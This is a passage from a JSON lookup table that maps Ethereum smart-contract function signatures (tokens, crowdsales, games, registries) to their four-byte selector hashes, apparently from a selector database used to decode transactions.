"0xb4a0a6b8", "UnityCoin()": "0x433a8323", "renameToken(string,string)": "0x41cc8912", "PumpHodl()": "0xc4626ea7", "EagorNetwork()": "0x04a0c67e", "ETIN(uint256,string,string)": "0x8eb5f650", "checkUserTokenBalance(address)": "0x3a7befc6", "checkUser(address)": "0x1e9d48cf", "tokensLeftInPhase(int8)": "0x6563b2fc", "getUnit()": "0xe55186a1", "publishFor(bytes12,address)": "0x5366f338", "distributeCallback(uint256,uint256,address[])": "0x3e9e9f26", "internalGetHowMuchUntilHardCap(uint256)": "0x50818fbb", "setPenalty(uint256)": "0x4a4b674a", "purchaseCallback(string)": "0x0fc72f4e", "QTB(string,string,address)": "0x97557f6a", "RENTALTOKEN(uint256,string,string)": "0xfa233620", "setMinTime(uint40)": "0x681c7808", "setMinBid(uint256)": "0x12874688", "transferCoins(address)": "0x54daedc3", "VpaxContract()": "0xe2442441", "EtherChain()": "0x6ba0f114", "TakeOffWorldwide()": "0x4da946d9", "doPremine()": "0xe34b7983", "TuZaiCoin(uint256,string,uint8,string)": "0x5dbb0ef8", "Coin(uint256,string,uint8,string)": "0x8f409b85", "transferAndLock(address,uint256,uint256,uint256,uint256)": "0x67ecb82d", "LockedToken(uint256,string,string)": "0x340a773a", "calculateFee(bool,bool,uint256,uint256)": "0xa025bcc3", "batchRefundzFixed(address[],uint256)": "0x00e37634", "batchRefund(address[],uint256[])": "0x07cd5c29", "BatchTransferContract(address)": "0xc387b2a7", "BAGToken()": "0x636ff44e", "IGFC(uint256,string,uint8,string)": "0xdb299492", "TUBECOINcontract()": "0xe1cba8d2", "_transferTokenToOwner()": "0x22817359", "Octiron()": "0x696e6a6a", "_setNewStartTime()": "0x7fa6c745", "_resetPotatoes()": "0xed8a4116", "_endContestIfNeeded(address,uint256)": "0xb6034964", "contestOver()": "0xbb8c869d", "timeLeftToCook()": "0x980e6e08", "timeLeftToContestStart()": "0x439198af", "timePassed()": "0xb4454253", "Halo3DPotPotato(address)": "0xebccb566", "AcceptsHalo3D(address)": "0x7ab7ab2e", "CATA()": "0x9132dfca", "getICORaisedAmount()": "0x40684172", "getPresaleRaisedAmount()": "0xa0726b72", "getInvestorCount()": "0x960524e3", "endCrowdSale()": "0xee98aee6", "isICOPeriod()": "0x1b4b1cfa", "isPreSalePeriod()": "0x3d946410", "isCrowdSaleStateICO()": "0x3a357b1d", "isCrowdSaleStatePreSale()": "0xab9ae1be", "refundedAmount(address)": "0x5016d29f", "getRefund(address)": "0x696c58c4", "Gryphon()": "0xc45d8c8b", "BitcoinTrade()": "0x7347a25d", "bytesToAddr(bytes)": "0x5ef6228c", "withdrawKrowns(address,uint256)": "0x7cc3b48e", "setWithdrawAccount(address)": "0x35a9a5c7", "getProductOrderPayer(uint256)": "0x2a8ab73c", "setUncleSafeNr(uint256)": "0x6cd186ce", "checkIfOnUncle(uint256,uint256)": "0xb0cb3299", "closeMicroWallet(uint256)": "0x04d6878f", "getMicroWalletAddress(uint256)": "0x2c0994c1", "createMicroWallet(uint256,uint256)": "0x176d0780", "changeApi(address,address)": "0x424d6bb1", "disableApiAccess(bool)": "0x02dd6731", "getKrsFromApproved(address,uint256)": "0x10e1c5e5", "sendKrs(address,uint256)": "0x54fa8044", "setAllRates(uint256,uint256,uint256)": "0x1ebedded", "setKrsUsdRate(uint256)": "0x0782709a", "setEthEurRate(uint256)": "0x68e03bf9", "removeAllowedAddress(address,address)": "0xe4444feb", "addAllowedAddress(address,address)": "0xabd796bf", "endIcoRoundManually()": "0xf3773466", "endIcoRound()": "0xea391420", "changeIcoRoundEnding(uint256)": "0x811c626d", "removeCurrentIcoRound()": "0x11791368", "newIcoRound(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x4129a9d5", "KinguinIco()": "0xcb7b3fb9", "newPaymentAddress(address)": "0x71a2f964", "addContract(address)": "0x5f539d69", "hasBeenDeployed(address)": "0x08508b8f", "unlock10PercentTokensInBatch()": "0x571af13b", "releaseRestPreSaleTokens()": "0x9140f6ee", "changeWalletOwnerAddress(address)": "0xcac9a94e", "stopCrowding()": "0xff4408ee", "unHalt()": "0x76865eea", "calculateGotTokens(uint256)": "0x9cbcfcc7", "queryLockedTokens(address)": "0xc450a08a", "addOneUserIntoWhiteList(address)": "0xa0b06190", "setWhiteListInBatch(address[])": "0x96c0fb8b", "buySCTK(address,uint256)": "0x32075c49", "SharesChainTokenCrowdFunding(address,address,uint256,address,address,address)": "0x73256a8d", "SharesChainToken(address)": "0xf0a233d4", "BoodooToken()": "0x4b376e45", "forwardFundToCompanyWallet(uint256)": "0x8d5f8d1c", "setCompanyWallet(address)": "0x28831187", "GeocashToken(uint256,uint256,uint256,address)": "0x628eaa88", "ASIABITSToken(string,uint8,string)": "0x5bdfaaff", "setLeastFund(uint256)": "0xd3b6486a", "setFunding(bool)": "0xeb3a2345", "setOnSaleAmount(uint256)": "0x471f4722", "TokenToken(uint256,string,string)": "0x4e8be64d", "setSendAllow(bool)": "0x0fed5dc8", "RCToken()": "0xc417becd", "UnlimitedIPToken()": "0x3495015a", "transferToContract(address,uint256)": "0x80cecea9", "QNTU(address[],uint256[])": "0xa5e00e53", "processUpgrade(address,uint256)": "0xd6271727", "forceUpgrade(address[])": "0x3c3ad016", "unfreezeUpgrade()": "0xf950db2b", "freezeUpgrade()": "0xb662a73c", "changeUpgradeAgent(address)": "0xa104dcd4", "unfreezeTransfer()": "0xd445cc78", "freezeTransfer()": "0x875606a1", "changeTokenInformation(string,string)": "0x6e5320d1", "isItOpen()": "0x6d9d39b6", "testTransferFromDoesNotAllowTransferOfMoreThanAllowedByDelegate()": "0x32525f09", "testTransferFromCorrectlyAllowsDelegationOfTokenOwnership()": "0x57e07140", "RewardOffer(address,address,bytes32,uint256,uint256,uint128,uint256)": "0xd75fabb0", "Relay()": "0x2dff3498", "pingReading(uint256)": "0x01ebc88e", "pingDelta(uint256)": "0x89e4e22b", "setResult(uint8)": "0x80ce60d1", "CappedToken(uint256)": "0xfa9f245c", "getTemplate(string,string)": "0x4f0ddd27", "createConsent(address,string,string)": "0xe68122e2", "createConsentFile(address)": "0x9deb0b41", "getAllConsentTemplates()": "0x4a3c4375", "getActiveConsentTemplates()": "0xa22ce93d", "addConsentTemplate(string,uint256,string,string,string)": "0x63822fdc", "ConsentFactory()": "0x34486434", "getListOfConsents()": "0xda5269a6", "addConsent(address)": "0x856bb9cc", "ConsentFile(address)": "0xa0d81b21", "getGiver()": "0x651c5d2d", "getTemplate()": "0x321c48f2", "Consent(address,address)": "0x12ff2ad9", "getLanguageCountry()": "0x06934753", "getText()": "0xe00fe2eb", "getPurpouse()": "0xb963e1d0", "getTitle()": "0xff3c1a8f", "ConsentTemplate(string,uint256,string,string,string)": "0x4d936889", "getCompanyList()": "0x69358e2e", "addCompanyURL(string,string)": "0xda9332bb", "ConsentDirectory()": "0xda38fe31", "getCompanyName()": "0x43cfbd65", "CompanyURL(string,string)": "0xcd9548ce", "uploadSignedString(string)": "0x0a29f508", "getStringToSignWithKey(string,int256)": "0xd4cf02ef", "Verificator()": "0x41f8a524", "getPublicKeys(uint256)": "0x372c1aff", "getPayment(uint256,string)": "0xac6d8150", "togglePayment(uint256,string)": "0x69a9e6b8", "addPayment(uint256,string,int256,bool)": "0x25aeb4a2", "removeHouseHold(uint256)": "0xf35a8796", "addHouseHold(uint256,uint256,uint256)": "0xf466f106", "BalanceBook()": "0x96c62b27", "testNumberOfElements()": "0x54b51fcc", "testEscapedQuoteInString()": "0x9f97a024", "testUnescapedQuoteInString()": "0x37391ce2", "testNotEnoughMemory()": "0x311a985f", "nCurves()": "0x3a47e629", "calculateHash(uint256,uint256,uint256,bool,bytes32)": "0x7ab7d55b", "toCollect(uint256)": "0x86bb1e03", "moveTo(uint256)": "0xcdd63344", "revealMulti(uint256[],uint256[],uint256[],bool[],bytes32[])": "0x627adaa6", "revealCurve(uint256,uint256,uint256,bool,bytes32)": "0x65f594a7", "setHiddenCurves(bytes32[])": "0x54657f0a", "DynamicCeiling(address,address)": "0x5148ccb9", "newDAO(address)": "0x21687444", "DAOFactory(address,address,address)": "0x81619954", "getString(string)": "0x9c981fcb", "getBool(string)": "0x9535ce12", "setBool(string,bool)": "0xb8b2bdad", "getInt(string)": "0xfda69fae", "setInt(string,int256)": "0xc2c5b9f1", "getUInt(string)": "0x3536046a", "setUInt(string,uint256)": "0xdf31566e", "exists(string)": "0x261a323e", "set(string,bytes32)": "0x2e3196a5", "setParent(address)": "0x1499c592", "VitalLogging()": "0xb67c2893", "executeDecayFunction(uint256,int256,int256,uint256,uint256)": "0x43f415d0", "getFunctionType()": "0xea03c115", "LinearDecayingTokenFunction()": "0x2aff101c", "goforit()": "0x2c83d77e", "setReputation(address,uint256)": "0xb120c16a", "Reputation()": "0x9904ed8d", "round(uint256[4])": "0xf7a33598", "endianConvert32bit(uint256)": "0xebdf0d5d", "endianConvert256bit(uint256)": "0x2a00ff6f", "externalFailure()": "0x20647eb7", "TransferDetails(string,uint256,string,uint256,uint256,address[])": "0xc1694bd4", "claimDeposit(bytes32)": "0x5e585889", "finalizeTask(uint256)": "0x88488c33", "uploadFile(uint256,uint256,bytes32,bytes32[],bytes32[],uint256)": "0xd3f06def", "getChallenges(uint256)": "0x946c0344", "queryChallenge(bytes32)": "0x6253367a", "challengeFinality(uint256)": "0x9bb32be3", "challenge(uint256)": "0xab82d9a0", "getCodeStorage(uint256)": "0xbf8ba305", "getCodeType(uint256)": "0xadee3f4b", "solutionInfo(uint256)": "0xaea5b69f", "solveIO(uint256,bytes32,bytes32,bytes32,bytes32)": "0xe631e9b3", "solve(uint256,bytes32)": "0x00cae5df", "getSolver(uint256)": "0x2addeab6", "nextTask()": "0x375188dc", "getVMParameters(uint256)": "0xe5291ac5", "taskInfo(uint256)": "0x77364291", "getUploadTypes(uint256)": "0xc144734c", "getUploadNames(uint256)": "0x0311a8f0", "defaultParameters(uint256)": "0xecb62e49", "getInteractive()": "0x20ce4c66", "Tasks(address,address)": "0x3bd797b0", "getRoot(bytes32)": "0x84f94221", "solved(uint256,bytes32[])": "0xfd4dabef", "minimumAmountWei()": "0x7f3cb47b", "setSelfOff()": "0xce2d173f", "selfDestructBeneficiary()": "0xc58aaae6", "min_inv()": "0xbb3f0390", "discountTokenPercent()": "0xaade8dcc", "TOKEN_PRICE_WEI()": "0x0499ed13", "price_target()": "0x2cb4f63e", "portfolioManager()": "0x620b75df", "daoFactory()": "0x48f7f2a3", "liquidationTimestamp()": "0x74b874a6", "RESERVED_PRESALE_CAP()": "0xb179882d", "tokensPerEther()": "0xf856d605", "COIN_SUPPLY_ICO_PHASE_0()": "0xc19e33ce", "pendingOwner2()": "0xab5366dd", "zTransferLosingBets()": "0x076a1852", "withdraw_2Completed()": "0x378e25f2", "ico3Ended()": "0xf1b676a4", "peth()": "0x7d211c75", "MaxDropReward()": "0x1bfe783e", "parametersAreSet()": "0x38cf2087", "slogan()": "0x24e5eeaa", "tokenbeneficiary()": "0x82f768d4", "txFeeCapInWei()": "0x14b72000", "lastTxBlockNum()": "0x21beba94", "blocksToWaitLong()": "0x89d77f82", "BaironSupply()": "0x73a5717e", "toLucky()": "0x2d364687", "deathData_a4()": "0x40d699b7", "buyoutAmount()": "0x1829b73f", "isLimitEnabled()": "0xdaf4f66e", "wavesId()": "0x590d431a", "bonusChangeTime()": "0xb02447e0", "intellisys()": "0x1c946642", "curatorAddress()": "0x001f91ce", "getCounterProposals()": "0x5af2f821", "reservedOwner()": "0x7493357b", "icoPvtEnded()": "0x03b0a55c", "lastLargestHODLERBalance()": "0x7d445654", "numberOfAlternatives()": "0xaa24e8aa", "getTicketStartPrice()": "0xa0d8848c", "weiICOMinimum()": "0xf4e68486", "PRICE_7()": "0x2d31908f", "startStage2()": "0x44f396fa", "betIsSettled()": "0x8c96e34b", "addUnsoldTokens()": "0x99847f77", "basicIncomeLimit()": "0xf50ecf0b", "percentageOfRaisedAmountThatRemainsInContract()": "0x62d6b7fb", "vestingBonusMultiplier()": "0xea3d895f", "thawGlobalTransfers()": "0x7725686f", "investorsLoses()": "0x333e1a72", "total_investors()": "0xa6b165ee", "teamPeriodLength()": "0xc31051fe", "whitelistingAddress()": "0x031adff0", "bonusCap()": "0xe325fb4b", "freeTokensAvailable()": "0xe8a207ad", "stepVestingPercent()": "0xe93b9c89", "refreshActiveShareholdersArray()": "0x27782e42", "advisersPartners()": "0x451f0601", "ensResolver()": "0xadce1c5f", "songTokenExchange()": "0x3f047053", "weekPotExpiration()": "0x7d736d0d", "cryptoString()": "0xb780a659", "totalTokensBurnt()": "0x455f6f31", "adminVer()": "0xdf5055e6", "BONUS_6_DAYS()": "0x00201e33", "merculetPrice()": "0x0a3c4dbe", "prenupAgreement()": "0x063cea26", "softCapCountDownTimer()": "0xc587f93e", "fundTeamCompany()": "0x4c676725", "useEIP712()": "0x5bd948b1", "participantCapTier2()": "0x672acef0", "AMBASSADOR_TWO()": "0x70dbb783", "platformTokensAddress()": "0x19c9a4f3", "confirmTeamWithdrawal()": "0x37b0ac71", "allFundsCanBeUnlocked()": "0xce8bcae3", "fundariaStakesFrozen()": "0x756f7ce8", "totalMarketingFundMinted()": "0xf5238660", "initMonsterClassConfig()": "0x37c44802", "Winner()": "0xb2b98ed2", "totalWithdrew()": "0xc768ac01", "awardTokens()": "0x70d07575", "invokeTop()": "0x33adb264", "tk()": "0x21f408be", "destTokensAdvisors()": "0x2f85f092", "te()": "0x25fc790f", "getOldSchoolCoins()": "0xaadf6838", "initialAmount()": "0xfc1ed437", "webGiftEtherAmount()": "0x0b8bbd5b", "part20Transfer()": "0x838a05e4", "GDCAcc01()": "0x7fdb5efb", "destroyUnsoldTokens()": "0x6a84e143", "priceTokenToCoin()": "0xf5bee4e6", "AVG_BLOCKS_02W()": "0xf0d02ce9", "referralFee_()": "0x45d607fe", "RESERVED_TEAM_SIDE()": "0x6f3b6d00", "setNewMint()": "0xe21b63b2", "ALLOC_ADVISORS_BOUNTIES()": "0x07dfe49f", "weekTwoStart()": "0x35ebbfd1", "getRealGoldBought()": "0x657f4783", "syndicateTokensWithdrawn()": "0xab044622", "setInfo(uint256,uint256)": "0xf3fb9a02", "setPubKey(uint256,uint256)": "0x43876776", "setAdmin(uint256,address)": "0x142e8e25", "setRegistrant(uint256,address)": "0x9f11e9cd", "newEntry(uint256)": "0x4ab3d487", "rivetzRegister(uint256,uint256,uint256,address,address)": "0xc9fca8a5", "register(uint256,uint256,uint256)": "0xfaa5c564", "JiJieHao(uint256,uint8,string,string)": "0x702d58d8", "mintToTeamAccounts()": "0xa26c7810", "init(uint256,address)": "0xb792e6ec", "castToUint(int256)": "0xae1a9a3e", "castToInt(uint256)": "0xf6814165", "regularEndGame(address,uint32,int256,uint256,address)": "0x182af96b", "userEndGame(uint32,int256,bytes32,bytes32,uint256,address,bytes)": "0xe60a33aa", "serverEndGame(uint32,int256,bytes32,bytes32,uint256,address,address,bytes)": "0x410453ae", "serverEndGameConflictImpl(uint32,uint8,uint256,uint256,int256,bytes32,bytes32,bytes32,bytes32,uint256,address)": "0x70239f0b", "userEndGameConflictImpl(uint32,uint8,uint256,uint256,int256,bytes32,bytes32,uint256,address)": "0x0b3e9c7b", "userForceGameEnd(uint256)": "0xb064ca18", "userCancelActiveGame(uint256)": "0x9b29f133", "userEndGameConflict(uint32,uint8,uint256,uint256,int256,bytes32,bytes32,uint256,address,bytes,bytes32)": "0x878de0ae", "serverEndGameConflict(uint32,uint8,uint256,uint256,int256,bytes32,bytes32,uint256,address,bytes,address,bytes32,bytes32)": "0x9399dd7e", "calcHash(uint32,uint8,uint256,uint256,int256,bytes32,bytes32,uint256)": "0xbe6010f9", "verifySig(uint32,uint8,uint256,uint256,int256,bytes32,bytes32,uint256,address,bytes,address,address)": "0x5246a8df", "setGameIdCntr(uint256)": "0x287e9fbc", "userForceGameEnd(uint8,uint256,uint256,int256,uint256,uint256)": "0x0c5ebb1a", "mountCitadel(address,address)": "0x6610a38a", "isSuperContract(address,address)": "0xf8588593", "removeContractAddress(address,address)": "0x6c2f64fe", "addContractAddress(address,address)": "0x3365d358", "MB()": "0xab4ef895", "ExShellToken()": "0x42f88699", "withdrawERC20(address,address,uint256)": "0x44004cc1", "_buyCommonTTW(uint256,uint256,address,address)": "0xaad429f1", "_buyCommonTTM(uint256,uint256,address,address)": "0xf7899d9e", "_buyDiscountTTW(uint256,uint256,address,address)": "0x40f04616", "_buyDiscountTTM(uint256,uint256,address,address)": "0xa31b858d", "buyCommonTTWByETH(uint256,address)": "0xc89b7d8c", "buyCommonTTMByETH(uint256,address)": "0x137c1feb", "buyDiscountTTWByETH(uint256,address)": "0x6ba47299", "buyDiscountTTMByETH(uint256,address)": "0xa4800172", "exchangeByPet(uint256,uint256,address)": "0xdf88fb44", "setTTCTokenAddress(address)": "0xd07e7d7c", "setTTWTokenAddress(address)": "0x11513ba5", "setTTMTokenAddress(address)": "0xeaf18c45", "setWARTokenAddress(address)": "0x491b8c45", "setDiscountTime(uint64)": "0x358049ea", "setNextCommonTTWTokenId2(uint64)": "0x81b31cec", "setNextDiscountTTWTokenId1(uint64)": "0xee987ffc", "setNextCommonTTMTokenId8(uint64)": "0x6054da0b", "setNextCommonTTMTokenId7(uint64)": "0xdf462098", "setNextCommonTTMTokenId3(uint64)": "0x5138574b", "setNextCommonTTMTokenId2(uint64)": "0x79ed3d69", "setNextDiscountTTMTokenId6(uint64)": "0xd8ba8ce3", "setNextDiscountTTMTokenId1(uint64)": "0x7d0e6b6f", "safeSendCard(uint256,address)": "0xf74758ef", "setIcoLockUntil(uint256)": "0x087c0055", "Match_Maker()": "0xa6cd8c68", "TourCashStandardToken(uint256,string,uint8,string)": "0x26887303", "_fhMoney(uint256,uint256,uint256,uint256,uint256,uint256)": "0x1be73e2b", "KNDToken()": "0x2397f92b", "NeuralProtocol()": "0xe8dcd15f", "ownerSendTokens(address,uint8,uint256)": "0xcb6291cb", "processPurchase(address,uint8,uint256)": "0xbcc30409", "_preValidatePurchase(address,uint8,uint256)": "0x7e167198", "buyTokens(address,uint8)": "0xe9f4043f", "getremainTokensperType(uint8)": "0x8c4ef31a", "getassignTokensperType(uint8)": "0x7ae9c856", "setVestingType(uint8)": "0x08a47c32", "setVestingRate(uint256)": "0x2ef35214", "ODCToken()": "0xd9e34038", "GetDetail(address)": "0xd2f7c5db", "CreatorWithdraw(uint256)": "0x4bc5d101", "WithdrawAll(address)": "0x2b3ede1c", "Withdraw(uint256,address)": "0x8353ffca", "Bet(uint256,string)": "0x33f3197e", "MatchEnd(uint256,string)": "0x3d201fcf", "MatchResetDeadline(uint256,uint256)": "0x59d313de", "AddMatch(string,string,uint256)": "0x7c77fad6", "setKYCLockupIgnoring(bool)": "0x316bc682", "GoGoPay()": "0x6177a197", "erc20(string,string,uint256,uint256)": "0xc42a0716", "TenStepTestCoin()": "0xc0e17c61", "sumOf(uint256[])": "0xba0df427", "isTransferAgent(address,address)": "0xa97cb561", "mintOnce(string,address,uint256)": "0x46862c8f", "computeHash(string)": "0x3aefaa75", "setUserManagerContract(address)": "0x4979d6ec", "getTokenAmount(uint256,address)": "0x1f39a141", "extendPreSalesPeriodWith(uint256)": "0xc5a988c9", "setLister(address)": "0x6ad6d45b", "removePublicSalesSpecialUser(address)": "0x4f069517", "addMultiplePublicSalesSpecialUser(address[])": "0x619fabfd", "addPublicSalesSpecialUser(address)": "0x40954254", "setMultiplePreSalesSpecialUsers(address[],uint256)": "0x4bd3a225", "setPreSalesSpecialUser(address,uint256)": "0x3a4148de", "markUserAsFounder(address)": "0x5d19212e", "getCrowdsaleContract()": "0xda233128", "isValidUser(address)": "0xf3c95c60", "getUserContractAddress(address)": "0xa6e497b6", "updateLastTransactionTime(address)": "0x32691d18", "setSpecialLimits(address,uint256,uint256)": "0xcca07f44", "setSpecialFeePercent(address,uint256)": "0x86e32cb5", "setFeePercent(uint256)": "0x7ce3489b", "setFeeRecipient(address)": "0xe74b981b", "setDisputeResolver(address)": "0x924e63f6", "setDisputeInterface(address)": "0xc0343b09", "resolveDisputeSeller(address,string)": "0xac3c27cf", "resolveDisputeBuyer(address,string)": "0x90d16b30", "completeOrder(string)": "0xb96c0866", "addOrder(string,address,uint256,uint256,string,address)": "0x389aa67c", "EZEtherMarketplace()": "0x7e3df726", "testAddVoters()": "0x2d0a8809", "testAddExistingVoter()": "0x99bad2cd", "testDeleteVoter()": "0xc906a5aa", "testAddVoter()": "0x3bf81b91", "testInitialNumberOfVoters()": "0x0bb4bbaf", "getOnBurnAmountValue()": "0xe33f6aaf", "getOnBurnTargetValue()": "0x4c41bf9d", "getOnMintAmountValue(int256)": "0xf64ab21a", "getOnMintTargetValue(int256)": "0xd42cda15", "getOnTokenTransferValueValue()": "0x48558be7", "getOnTokenTransferToValue()": "0xd16b6473", "getOnTokenTransferFromValue()": "0x289471d5", "getMintForReportingParticipantAmountValue(int256)": "0x7397d5f1", "getMintForReportingParticipantTargetValue(int256)": "0xb3539c44", "getFeeWindowBurnAmountValue()": "0x597cae8d", "getFeeWindowBurnTargetValue()": "0x01e40f5b", "getInitializedFeeWindow()": "0x7a4f7b92", "onTokenTransferCalled()": "0x50609cea", "onMintCalled(int256)": "0x94ae4899", "onBurnCalled()": "0x99393132", "getNodes(string)": "0x9fb8657b", "addNodesToList(string,address)": "0x92d69a39", "addNodes(string,address)": "0x51ca7a94", "Y()": "0x45b3fe42", "MyAdvancedToken(uint256,string,uint8,string)": "0x455a2a37", "currentRoundLocked()": "0x6841f253", "currentRoundInitialized()": "0x219bc76c", "currentRoundStartBlock()": "0x8fa148f2", "currentRound()": "0x8a19c8bc", "blockHash(uint256)": "0x85df51fd", "blockNum()": "0x8ae63d6d", "initializeRound()": "0xd4807fb2", "BurnableCrowdsaleToken(string,string,uint256,uint256,bool)": "0x2adbc396", "testNewCounterValueAfterAIncreaseAndADecrease()": "0x8e3571c0", "testNewCounterValueAfterADecrease()": "0x17bd927c", "testNewCounterValueAfterAIncrease()": "0x69a56df4", "testNewCounterValueIszero()": "0xf7963e8a", "changeACAddress(address)": "0x2f85577f", "testUser(address)": "0xfd5a6019", "testManager(address)": "0x2a9b4921", "testSuperUser(address)": "0x32b8c086", "testAccess(address)": "0xa6223a58", "method3(string)": "0x635f6a79", "method2(bool)": "0xa25367ff", "method1()": "0x5aee9431", "getUserAtIndex(uint256)": "0xffcc7bbf", "updateUserAge(address,uint256)": "0x2e071db3", "updateUserEmail(address,string)": "0x64319ae6", "insertUser(address,string,uint256)": "0x52b1e14a", "setOpsAddress(address)": "0x707789c5", "isOwnerOrOps(address,address)": "0x64c27f2a", "isOps(address,address)": "0x8293779c", "isAdmin(address,address)": "0x91006745", "OpsManaged()": "0xb12e5f09", "MSPPlaceHolder(address,address,address,address)": "0x553aaafe", "getWinner(uint256)": "0x4129b2c9", "guess(uint256,string)": "0x773f5edc", "getAnswer(uint256)": "0xb5ab58dc", "getQuestion(uint256)": "0xdb88176f", "add(string,bytes32)": "0x691de4a4", "numberOfQuestions()": "0xb4594c36", "Auth()": "0xab8a0360", "payout(uint256,address)": "0xbe95e01a", "smart()": "0x27a822df", "getEndtime()": "0xbbfb2f7a", "createHash(address,bytes32,bytes32)": "0x8ba7e7f2", "claimRefund(address,bytes32)": "0x5e488540", "withdraw(bytes32,bytes32)": "0x63615149", "getHashFromData(bytes32,bytes32)": "0xcc6266a1", "Remmittance(uint256,uint256)": "0x136aa762", "withdrawTwice()": "0xcccb987f", "setRoscaAddress(address)": "0x776b6b27", "markRedeemed(address)": "0xca2e8cc5", "requestRedemption(address)": "0xfbec51bc", "submitAudit(address,bytes32,bool)": "0xf03bcc7f", "isCustodianOf(address,address)": "0xa004ee5a", "isVendorOf(address,address)": "0x820c7468", "GoldRegistry(address)": "0xbf255974", "burn(uint256,address)": "0xfcd3533c", "mint(int256,bytes32,bytes,uint256[],bytes,bytes)": "0x2d3e9efe", "ownerCredit(address,uint256)": "0x867a66ac", "setETCLockingAddr(address)": "0xdf8f8a81", "ETCToken(address)": "0x6c78cb81", "MultiplyContract(address,address,uint256,uint256,uint256,uint256)": "0x507d17bb", "recv_from_side_chain(uint256,bytes)": "0xec90a79a", "send_to_side_chain(uint256,address,uint256)": "0x4c6e5926", "get_cross_chain_nonce()": "0x5999917c", "get_banlance(address)": "0xf7407178", "numSubscribed()": "0x9528fcb5", "DoradoToken()": "0xab889df9", "verifyCestificate(address,uint256)": "0xb443c607", "approCertificate(uint256)": "0xd52c6c08", "getStudentRequest()": "0x0a1e7a89", "applyForCertifition(address,string,uint256,string,uint256,bool)": "0x26e89689", "getCourseLength()": "0x82c00a50", "addCourse(string,uint256,uint256,uint256,string,string)": "0x72259875", "returnHash(address[2],uint256[7])": "0xcfa12510", "returnCreatorAddress(bytes32,uint8,bytes32[2])": "0x4b11281e", "adminStewardship(address[2],uint256[7],uint8,bytes32[2])": "0xac45185d", "settleETH(bytes32)": "0xa201bf26", "settleToken(bytes32,address,uint256,uint256)": "0x355784cb", "claimUnderlying(address[2],uint256[7],uint8,bytes32[2])": "0x37632065", "claimPremium(address[2],uint256[7],uint8,bytes32[2])": "0xc2f0dbe2", "depositEther(address[2],uint256[7],uint8,bytes32[2])": "0x77109b05", "withdrawSeller(address[2],uint256[7],uint8,bytes32[2])": "0x7f925c93", "withdrawBuyer(address[2],uint256[7],uint8,bytes32[2])": "0xd2faf216", "depositToken(address[2],uint256[7],uint8,bytes32[2])": "0x7ecf9142", "depositPremium(address[2],uint256[7],uint8,bytes32[2])": "0x22888f35", "getOptionState(address[2],uint256[7])": "0x54eb3f74", "LSECoin()": "0xbb5f95fe", "getNewMaxProfit(uint256,uint256)": "0x6aafb887", "random(uint256,uint256,address,uint256)": "0xb69e7d70", "maxRandom(uint256,address,uint256)": "0xe0195a53", "VictorieumNewToken()": "0x38b09889", "createChild(uint256)": "0x0419eca5", "HEOContract()": "0xe4983e27", "MovieWorld()": "0x7caf3115", "CommunityAdVoucher()": "0x05d861fa", "SIGTToken()": "0x6be598b4", "vendi()": "0xfbd9c902", "BTestToken(uint256,string,uint8,string)": "0xcc991d8a", "LotToken()": "0xcb3b0c79", "stakeWithCurrentPeriod(uint256)": "0x1bad3903", "stake(int256)": "0x77b71df0", "restake(int256)": "0xb6c054ce", "calculateFEE2Distribute()": "0x9c27ff9b", "ensureInterval()": "0x949076b6", "getCurrentStakingPeriod()": "0x7ae11443", "getStake(address)": "0x7a766460", "withdrawTokens(address,address)": "0xa522ad25", "getUserPools(address)": "0x9816af58", "getPoolInformation(address)": "0x0854f856", "forceWithdrawTokensToAnAddress(address)": "0x722d1267", "withdrawMyTokens()": "0x5d3f4fe4", "enableTokenWithdrawals()": "0x3f2b1040", "getContributorInformation(address)": "0xe63988bd", "getPoolInformation()": "0x48749616", "withdrawContribution(uint256)": "0xd25090ff", "updateWhiteListImplementation(bool)": "0x913579b6", "addMultipleAddresseseToWhitelist(address[])": "0x138b806c", "Dollars()": "0x21ed46ad", "getPeers()": "0xcd559561", "store(address,address,uint256,uint8,uint8,bytes)": "0xc7b31ed0", "addressToBytes2(address)": "0xa4d714c7", "toBytes2(bytes)": "0x268e7075", "checkAddressTeamTwo(address)": "0x1a8dc392", "checkAddressTeamOne(address)": "0x2c86033e", "addressToBytes1(address)": "0xf280efaf", "toBytes1(bytes)": "0xa5790bde", "tie()": "0xd6f5c939", "teamTwoWin()": "0x24eda713", "teamOneWin()": "0x9463d582", "distributeDivs(uint256,uint256)": "0xf0a3ce5d", "timeAdjustNeg()": "0xeb239d9a", "timeAdjustPlus()": "0x7d40189a", "currentWinner()": "0xaabe2fe3", "adjustedPotBalance()": "0x80097a8e", "totalPlayers()": "0xf60cdcf6", "teamTwoTotalPlayers()": "0xfe0dadd7", "teamOneTotalPlayers()": "0x7c8e17e5", "currentRoundInfo()": "0x008f8b35", "calcUserDivsAvailable(address)": "0xfa0c76c5", "calcUserDivsTotal(address)": "0x6dbe2ebc", "reduceTime()": "0xf60436cd", "fundPot()": "0x9c737e8f", "resolveRound()": "0x7c8af704", "openRound(uint256,uint256)": "0x0bf09985", "getBadges()": "0x42a04fea", "getReferer(address)": "0x6d03fa87", "getBalanceDivis(address)": "0x3e9bee1b", "_resetBalanceDivis(address)": "0xe9cbd678", "_transferDivis(address,uint256)": "0x031324fa", "_withdrawDivis(address)": "0x7fbf28f7", "withdrawDivis()": "0x0ed86f04", "_increasePlayerDivis(address,uint256)": "0x5f91af39", "_specialDistribution(address,uint256)": "0xa22304cd", "_normalDistribution(uint256,uint256)": "0xddd83259", "_shareToDistribution(uint256,address,uint256,uint256)": "0xc15ae376", "_shareToReferer(address,uint256,uint256)": "0xca88a7b0", "_shareToPreviousOwner(address,uint256,uint256)": "0x5dc70cda", "_diviSplit(uint256,address,address,uint256)": "0x5469aabb", "_badgeOwnerChange(uint256,address)": "0x34fc62ff", "_extendBadges(uint256,address,uint256)": "0xb0cbe292", "_refererUpdate(address,address)": "0x372f6bfe", "_startContract(uint256)": "0xf08ea4cc", "initGame(address,uint256,uint256,uint256)": "0x7d49300d", "getChainLength()": "0x8f2bab07", "getCreationTime(uint256)": "0x97ec23cb", "getBuyTime(uint256)": "0x9c14c77b", "filterBrick(uint256,bytes32[],uint256,uint256,uint256)": "0x43a886ea", "getBrickBuilders(uint256)": "0xe59e1ca6", "getBrickDetail(uint256)": "0x3c6bc24b", "getBrick(uint256)": "0xfefd51b2", "startWork(uint256,bytes32,bytes32,address)": "0xe7db6770", "accept(uint256,address[],uint256[],uint256)": "0x86c2e8e3", "changeBrick(uint256,string,string,string,bytes32[],uint256)": "0x004dcd1c", "addBrick(uint256,string,string,uint256,string,bytes32[],uint256)": "0xb92cb5b8", 